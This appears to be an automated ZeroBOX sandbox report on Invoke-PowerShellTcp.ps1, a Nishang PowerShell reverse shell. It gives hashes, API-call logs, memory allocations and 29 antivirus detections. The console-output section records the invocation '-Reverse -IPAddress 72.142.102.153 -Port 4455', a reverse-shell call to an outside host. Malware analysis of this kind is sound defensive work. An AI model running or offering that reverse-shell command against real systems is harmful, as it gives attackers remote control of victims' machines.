Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 19, 2023, 5:42 p.m.	Sept. 19, 2023, 5:44 p.m.

Size	4.3KB
Type	ASCII text
MD5	`3fb164866fcea6e910934928d323fc4c`
SHA256	`310e4d4c2d330b1a08221b67fe05f731379b9d916df0946d1698850bba2c5389`
CRC32	`C1C0A45A`
ssdeep	`96:J+rbXHvonUsYqwLZvUqVn/0b37DMo6XBr4qIVCqiMP:Jyb3QCK+lo6XBEfVCqi6`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\Invoke-PowerShellTcp.ps1
3020

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
72.142.102.153	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Sept. 19, 2023, 5:42 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: WARNING: Something went wrong! Check if the server is reachable and you are using the correct port. console_handle: 0x0000001b	1	1
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: Invoke-PowerShellTcp : Exception calling ".ctor" with "2" argument(s): "No conn console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: ection could be made because the target machine actively refused it 72.142.102. console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\Invoke-PowerShellTcp.ps1:128 char:21 console_handle: 0x00000053	1	1
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: + Invoke-PowerShellTcp <<<< -Reverse -IPAddress 72.142.102.153 -Port 4455 console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorExcep console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: tion console_handle: 0x00000077	1	1
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: + FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorExceptio console_handle: 0x00000083	1	1
WriteConsoleW Sept. 19, 2023, 5:42 p.m.	buffer: n,Invoke-PowerShellTcp console_handle: 0x0000008f	1	1

Uses Windows APIs to generate a cryptographic key (8 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 19, 2023, 5:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05ee16f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 5:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05ee16f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 5:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05ee16f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 5:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05ee16f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 5:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05ee16f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 5:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05ee16f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 5:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05ee16f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 19, 2023, 5:42 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x05ee16f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Allocates read-write-execute memory (usually to unpack itself) (17 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0226b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02209000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06230000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04f52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 589824 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x063d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06420000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06421000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06422000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06423000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06270000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06271000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06272000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06273000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06274000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 19, 2023, 5:42 p.m.	process_identifier: 3020 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06275000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Communicates with host for which no DNS query was performed (1 event)

host

72.142.102.153

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

DrWeb	PowerShell.ReverseShell.8
McAfee	HTool-Nishang
Sangfor	Hacktool.Generic-Script.Save.14e69ed4
Arcabit	Heur.BZC.PZQ.Boxter.81.3D2A2567
Cyren	PSH/Nishang.B
Symantec	Hacktool.Nishang
ESET-NOD32	PowerShell/RiskWare.RemoteShell.F
Avast	Script:SNH-gen [PUP]
Cynet	Malicious (score: 99)
Kaspersky	Backdoor.PowerShell.Agent.be
BitDefender	Heur.BZC.PZQ.Boxter.81.3D2A2567
MicroWorld-eScan	Heur.BZC.PZQ.Boxter.81.3D2A2567
Tencent	Win32.Backdoor.Agent.Zchl
Emsisoft	Heur.BZC.PZQ.Boxter.81.3D2A2567 (B)
F-Secure	PrivacyRisk.SPR/RemoteShell.LFJB
VIPRE	Heur.BZC.PZQ.Boxter.81.3D2A2567
McAfee-GW-Edition	BehavesLike.PS.Suspicious.xr
FireEye	Heur.BZC.PZQ.Boxter.81.3D2A2567
Sophos	ATK/Nishang-A
Ikarus	Trojan.PowerShell.Reverseshell
Avira	SPR/RemoteShell.LFJB
Microsoft	Backdoor:PHP/Webshell
ZoneAlarm	Backdoor.PowerShell.Agent.be
GData	Heur.BZC.PZQ.Boxter.81.3D2A2567
Google	Detected
ALYac	Heur.BZC.PZQ.Boxter.81.3D2A2567
Rising	HackTool.Generic!8.46D (TOPIS:E0:qe1CsWPSh5H)
MAX	malware (ai score=80)
AVG	Script:SNH-gen [PUP]

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (2 events)

dead_host	72.142.102.153:4455
dead_host	192.168.56.102:49163

Invoke-PowerShellTcp.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All